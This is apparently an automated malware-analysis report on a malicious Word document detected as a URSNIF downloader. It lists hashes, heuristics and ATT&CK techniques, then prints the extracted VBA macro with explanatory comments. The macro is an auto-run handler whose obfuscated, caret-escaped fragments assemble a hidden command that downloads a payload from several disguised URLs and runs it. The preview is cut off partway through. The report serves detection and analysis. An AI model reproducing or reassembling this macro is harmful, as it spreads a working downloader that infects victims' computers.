Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6a1db36afe15df2d…

MALICIOUS

Office (OLE)

72.1 KB · Created: 2018-09-06 17:47:00 · Authoring application: Microsoft Office Word · First seen: 2018-10-07
MD5: 7b145c7037c4398e66b2e54717e7da96 SHA-1: c9273a2c85f0a221e0170e8f920dc1115daefa17 SHA-256: 6a1db36afe15df2d17dad29ecd8f411d20ce6bda24bf07eb3df9d9a17b151ff6
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1204.002 User Execution: Malicious File

The sample contains VBA macros, including a Document_Open macro that calls the Shell() function, so code runs as soon as the document is opened with macros enabled. This indicates an attempt to execute arbitrary commands, most likely to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.URSNIF-6729855-3' further supports its role as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard Office Open XML schema namespace, not a network indicator

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5110 bytes
SHA-256: 7f27ad2e23197737df14849728f0c2ab11718232dc14586184b0065ceac1dd0a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NQuULHvUiRvqd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header as exported by olevba: a random-looking module name whose VB_Base
' references Normal.ThisDocument and whose VB_PredeclaredId is True, i.e. the
' document module that hosts the Document_open auto-exec handler that follows.
Private Sub Document_open()
' Auto-exec entry point: Word runs this handler when the document is opened
' (with macros enabled). The statement below is a single "On Error Resume Next"
' broken across four lines with "_" continuations, presumably to hinder simple
' pattern matching; it suppresses every run-time error raised in this Sub.
On _
Error _
Resume _
Next
' Concatenates seven pieces into one command line and runs it through Shell with
' a hidden window (vbHide). Of the pieces, only kpXDLDdw and NibLhuDmK are defined
' in the visible preview; DOViAi, MRrYQWZrtlb, VWbPPmALV, DfLLtpfOqMViK and
' XspzmjzEirt must come from other modules of the macro project.
Shell Format(DOViAi) + MRrYQWZrtlb + VWbPPmALV + kpXDLDdw + NibLhuDmK + DfLLtpfOqMViK + XspzmjzEirt, vbHide
End Sub



Attribute VB_Name = "lspTrBBUk"
' Second module of the project (olevba keeps each module's VB_Name line); it holds
' the helper functions that assemble the fragments of the command line.
Function kpXDLDdw()

' Returns one fragment of the command line that Document_open passes to Shell.
' "On Error Resume Next" (again split with "_" continuations) swallows any error
' raised in this function, so the bare "Month <string>" statements below never
' abort execution. Their result is discarded and their arguments are arbitrary
' strings, so they appear to be filler inserted between the real assignments.
' The Chr() sums evaluate to constants: Chr(8+2+17+18+54) = Chr(99),
' Chr(5+1+11+12+38) = Chr(67), Chr(2+0+5+5+22) = Chr(34). The many "^"
' characters are cmd.exe escape characters, which cmd strips when it parses the
' line; the string is therefore a caret-obfuscated command whose readable form
' only appears at run time. Detection should key on the Shell/vbHide call and on
' the resulting child process rather than on these literals.
On _
Error _
Resume _
Next
Month "501542088" + "zq"
   Month "wN" + "c" + "pczGWMnwH" + "PT"
   Month "ljiG" + "YcS"
' First fragment: starts with the interpreter name and its switches.
GzaDfMfTjjt = Chr(8 + 2 + 17 + 18 + 54) + "md" + " " + "/" + "V^:" + "^O/" + Chr(5 + 1 + 11 + 12 + 38) + Chr(2 + 0 + 5 + 5 + 22) + "^s" + "^et" + " ^"
Month "zpBZKzYdf" + "wAvi" + "wOw" + "pd"
YuTkdUj = "EO^" + "t" + "= ^ ^ " + " ^ " + "^ " + "   ^" + "  ^  ^" + " " + "^   " + "}}" + "^" + "{h" + Chr(8 + 2 + 17 + 18 + 54) + "ta" + Chr(8 + 2 + 17 + 18 + 54)
Month "jHYN" + "369315574"
   Month "sCjp" + "dDpSRHi"
UWMFjHCsA = "^}" + "^" + ";" + "k^ae" + "r^b^;^" + "H^uv" + "$^ " + "me^" + "tI^-eko" + "vnI;)Hu" + "v$^ "
Month "dJSGRzPhanO" + "240977385"
   Month "373096314" + "u" + "ijI" + "jDB"
   Month "315223330" + "jjcYZOWP"
   Month "id" + "319434404" + "jkUPzQQ" + "2841"
EXKambtEwXY = "," + "^k^SV^" + "$(^" + "el" + "i^F" + "^" + "d^a^ol" + "n^w" + "oD^." + Chr(5 + 1 + 11 + 12 + 38)
Month "NYspJNIiB" + "3447" + "6956" + "276049525"
fnlJRXuri = "u^Y${y" + "r^t{)^z" + "wD^" + "$^" + " n^i k^" + "S" + "V" + "^$(^" + "h" + Chr(8 + 2 + 17 + 18 + 54) + "a^er^" + "o" + "f^;^'^e" + "^x"
Month "bG" + "cvI" + "BcK" + "bLYbIN"
   Month "EpFWpHREmmf" + "534289160"
   Month "3425" + "509625931" + "499993792" + "otGP"
   Month "Jj" + "H"
nYdBwGdj = "e.^'^" + "+" + "^z^G" + "E$" + "^" + "+'\^"
Month "95365227" + "18503586"
   Month "4949" + "423505608" + "499802867" + "6676"
   Month "FaWCGrv" + "jlO" + "njb" + "134683186"
DhFpAnwz = "'^+" + Chr(8 + 2 + 17 + 18 + 54) + "^i^l" + "^" + "bup^:vn" + "^e$" + "=" + "^H" + "^uv" + "$;^" + "'6" + "^0^2" + "' ^=^"
Month "V" + "113054156"
   Month "dG" + "tQLUWnBSfRIV" + "A" + "G"
cPGqGRwMpBZ = " z^" + "G^E" + "^$;)^'" + "^@^'(" + "ti^lp" + "^S^" + ".^'^Ob" + "/m^o" + Chr(8 + 2 + 17 + 18 + 54) + "^"
Month "kMClvhBP" + "Fii" + "KLhk" + "8045"
auYRQws = ".r^et" + "ra" + Chr(8 + 2 + 17 + 18 + 54) + "^mj" + "a//^" + ":^p^tt^" + "h^@" + "46/r^b^" + "."
' The return value is the nine fragments joined in order; the trailing Month
' statement after it is more filler and does not affect the result.
kpXDLDdw = GzaDfMfTjjt + YuTkdUj + UWMFjHCsA + EXKambtEwXY + fnlJRXuri + nYdBwGdj + DhFpAnwz + cPGqGRwMpBZ + auYRQws
   Month "DUGnjfYG" + "MH"
End Function
Function NibLhuDmK()

On _
Error _
Resume _
Next
Month "490935583" + "485398599" + "jzSk" + "URQoDqVo"
   Month "PGPBP" + "277265715" + "uwQ" + "dMud"
   Month "329915906" + "168670823" + "LSRK" + "349860888"
OuIALhdGYdV = "m^o" + Chr(8 + 2 + 17 + 18 + 54) + ".o" + "^a" + Chr(8 + 2 + 17 + 18 + 54) + "^iu" + "b^irt^s" + "^" + "id^" + "3f//:" + "^pt" + "^th^@b" + "F^A/t" + "en.n^e^" + "w^i^" + "ly"
Month "MaZnfCwOq" + "LGuqqstQs" + "j" + "1553"
   Month "1551" + "7453"
sXfCcEsB = "r" + "rah/" + "/:pt^t" + "h^@KeYJ" + "^0/^m^o" + Chr(8 + 2 + 17 + 18 + 54) + "." + "^ayn^" + "-nah/"
Month "92930887" + "YFNIu"
   Month "cjsWH" + "TAMT"
   Month "9355" + "vSFkDlk" + "341292928" + "S"
kEJCqsNzZMz = "/^:p" + "^tth@D^" + "a^W^" + "b" + "/^m^" + "o" + Chr(8 + 2 + 17 + 18 + 54) + "^.su^f" + "e^e^g^" + "d"
Month "ODV" + "z" + "8590" + "292201913"
   Month "jpk" + "DjmYCzapt"
   Month "w" + "bKbkF"
QPdpE = "l" + "o//:" + "ptt" + "^" + "h^'=^zw" + "^D^$;^t" + "ne^i^"
Month "DVWAPdGjjc" + "230389199"
   Month "hisfddS" + "iQwDzJQCO"
   Month "203060380" + "h"
UKOfiX = "l" + Chr(5 + 1 + 11 + 12 + 38) + "b" + "e^W." + "^t" + "^eN^ t" + Chr(8 + 2 + 17 + 18 + 54) + "^e^jbo-"
Month "PiosD" + "APb"
   Month "338398112" + "157489204" + "mkS" + "UBtr"
   Month "cucCEFlFvYRGBs" + "XmZqFad" + "6251766" + "ZzB"
   Month "43386783" + "rHa" + "KBWmFkpsjSZH" + "QZvvFXHz"
WtFbdT = "w" + "^en^=" + Chr(5 + 1 + 11 + 12 + 38) + "uY$^ " +
... (truncated)